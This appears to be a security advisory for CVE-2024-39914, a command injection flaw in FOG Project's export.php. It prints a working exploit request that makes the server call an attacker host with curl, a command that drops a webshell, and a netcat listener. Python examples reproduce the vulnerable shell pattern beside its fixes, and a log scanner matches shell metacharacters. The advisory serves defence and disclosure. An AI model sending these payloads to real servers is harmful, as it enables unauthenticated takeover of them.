CVE-2024-39914 is a critical unauthenticated command injection vulnerability in FOG Project version ≤ 1.5.10.34. The flaw exists in how the filename parameter is processed by export.php, allowing attackers to inject arbitrary system commands. This can be used for immediate command execution or to drop a persistent PHP webshell for follow-up exploitation.
- CVE ID: CVE-2024-39914
- Severity: Critical
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 92.67%
- Affected Versions: ≤ 1.5.10.34
- Patched Version: 1.5.10.35
- Authentication Required: No
Impact: Remote Command Execution
Technical Breakdown
The export.php script in the fog/management/ directory passes the filename parameter into a backend system command without sanitization, likely via shell_exec() or a similar function.
An attacker can inject system commands inside the filename parameter, for example:
filename=$(id)
This leads to immediate execution of id on the server. Additionally, attackers can write arbitrary content (e.g., a webshell) into a file on the server:
filename=$(echo '' > WEBSHELL)
The resulting file (WEBSHELL) can then be accessed remotely to execute further OS commands.
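The bug class described above, shown as an added illustration in Python rather than FOG's own PHP (the page only says the code likely uses shell_exec(); the exact export command is an assumption here, so a harmless printf stands in for it). The vulnerable shape interpolates the filename parameter into a shell string; the two defensive shapes beside it pass the value as a single argv element with no shell, and validate it against an allowlist before anything is executed. The probe value is a constructed, benign stand-in for the $(id) payload on the page.

```python
"""Illustration (not FOG's code) of the bug class behind CVE-2024-39914:
an export "filename" parameter interpolated into a shell command line,
beside two defensive patterns (argv without a shell, and an allowlist).
The page says the vulnerable code *likely* uses shell_exec(); this Python
re-creation is an assumption about the shape of the flaw, not its source."""
import re
import subprocess

# Allowlist for a user-supplied export name: letters, digits, dot, dash,
# underscore; no leading dot or dash (blocks "..", hidden files, "-flags").
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def export_vulnerable(filename: str) -> str:
    """Vulnerable shape: the parameter lands inside a shell string, so
    $(...) is expanded by /bin/sh before printf ever sees it."""
    cmd = f"printf '%s\\n' {filename}"          # hypothetical export step
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def export_no_shell(filename: str) -> str:
    """Fix 1: pass the value as one argv element with shell=False. The
    string reaches printf byte-for-byte; nothing interprets $( ) or ;."""
    out = subprocess.run(["printf", "%s\n", filename],
                         capture_output=True, text=True)
    return out.stdout.strip()


def export_hardened(filename: str) -> str:
    """Fix 2 (preferred): validate against an allowlist first, then run
    without a shell. Rejects anything that is not a plain file name."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected export name: {filename!r}")
    return export_no_shell(filename)


if __name__ == "__main__":
    probe = "$(echo injected)"   # constructed, benign stand-in for $(id)
    print("vulnerable :", export_vulnerable(probe))   # shell expanded it
    print("no shell   :", export_no_shell(probe))     # literal text, unexpanded
    try:
        export_hardened(probe)
    except ValueError as e:
        print("hardened   :", e)
```

The allowlist is the important layer: dropping the shell stops command substitution, but a name such as ../../etc/passwd would still be a valid argv element, which is why the hardened path rejects anything that is not a plain file name before it reaches the export step.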
Conditions for Exploitation
- FOG server must be network accessible
- No login or session is required
- Web server user must have write access to the web directory
- PHP execution is enabled under /fog/management/
Exploitation Steps
To exploit this, inject a system command in the filename parameter to achieve unauthenticated RCE.
Step 1: Send Malicious POST Request
POST /fog/management/export.php?filename=$(curl+192.168.100.8)&type=pdf HTTP/1.1
Host: 192.168.15.5
Content-Length: 21
User-Agent: ToxicPotato
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

fogguiuser=fog&nojson=2
Step 2: Monitor the Attacker Server
On the attacking machine (e.g., 192.167.100.1), listen for incoming requests:
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 80
Connection from 192.168.15.5:49802
GET / HTTP/1.1
Mitigation
- Upgrade to FOG Project 1.5.10.35 or later, where input validation and shell execution logic have been corrected
- Restrict access to /fog/management/ from public networks
- Apply input validation and disallow shell execution from user-supplied parameters
- Use a WAF to detect command injection patterns ($(), ;, |, etc.)
- Disable PHP execution in upload/export directories if possible
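The WAF bullet above lists the metacharacters worth matching; the same check can be run retrospectively over web-server access logs to find attempts that already reached export.php. This is an added example, not a FOG component or a WAF rule set: it parses combined-format log lines, URL-decodes the query string and flags any export.php request whose filename value carries shell metacharacters. The log lines are constructed for the example and use documentation address ranges (203.0.113.0/24, 198.51.100.0/24).

```python
"""Retrospective detection for the export.php injection pattern: parse
web-server access-log lines, URL-decode the query string, and flag any
request to export.php whose "filename" value carries shell metacharacters.
Sample log lines below are constructed for this example; the 203.0.113.0/24
and 198.51.100.0/24 addresses are documentation ranges, not real hosts."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined-format request line: client, timestamp, method, target, status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters that let a parameter break out of a shell word:
# $ ( ) backtick ; | & < > and line breaks
METACHARS = re.compile(r'[$`;|&<>()\r\n]')

SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2024:12:00:01 +0000] "GET /fog/management/export.php?filename=hosts.csv&type=csv HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2024:12:00:05 +0000] "POST /fog/management/export.php?filename=%24%28curl+198.51.100.9%29&type=pdf HTTP/1.1" 200 512 "-" "ToxicPotato"
203.0.113.7 - - [10/Jul/2024:12:00:09 +0000] "GET /fog/management/index.php?node=host HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2024:12:00:13 +0000] "POST /fog/management/export.php?filename=report.pdf%3Bid&type=pdf HTTP/1.1" 200 512 "-" "ToxicPotato"
this line is not a valid access-log record and must be skipped
"""


def scan_access_log(text: str) -> list[dict]:
    """Return one finding per export.php request whose filename parameter
    contains shell metacharacters after URL decoding."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # malformed or truncated record
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/export.php"):
            continue
        # parse_qs percent-decodes and turns '+' into a space, so the
        # check sees the value the way the shell would have received it
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("filename", []):
            if METACHARS.search(value):
                findings.append({
                    "src": m["src"], "ts": m["ts"], "method": m["method"],
                    "filename": value, "status": m["status"],
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['method']} status={f['status']} "
              f"filename={f['filename']!r}")
```

Matching is done on the decoded value, not the raw request line, so percent-encoded forms such as %24%28 are caught the same way as a literal $(. A 200 status on a flagged line is a signal to treat the host as compromised rather than merely probed, since the page notes the same injection can drop a persistent webshell.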